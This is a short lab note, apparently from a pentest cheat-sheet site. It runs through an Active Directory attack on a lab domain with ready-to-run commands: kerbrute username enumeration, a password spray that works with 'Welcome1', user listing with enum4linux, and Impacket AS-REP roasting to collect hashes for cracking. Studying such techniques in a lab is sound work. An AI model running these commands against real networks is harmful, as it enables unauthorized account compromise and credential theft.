Cheat Sheets

Lab Notes

  • Guess names of valid accounts from statistically likely usernames

    • produce custom list using base lists, as format used by environment did not already have corresponding wordlist

    • kerbrute_linux_amd64 userenum --dc 192.168.1.200 -d acme.local ./statistically-likely-usernames/john_smith.txt

  • Perform password spray across all discovered usernames with "Welcome1"

    • kerbrute_linux_amd64 passwordspray -d acme.local --dc 192.168.1.200 valid_usernames.txt Welcome1

    • password spray was successful for user chris_nelson

  • Get list of all domain users

    • enum4linux -U -u chris_nelson -p Welcome1 192.168.1.200

  • Get list of ASREP Roastable users and their hashes for cracking

    • python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -usersfile all_usernames.txt -request -format hashcat -outputfile ASREP_roastable_users_hashes.txt -dc-ip 192.168.1.200 'ACME/'

PreviousLab Creation

Last updated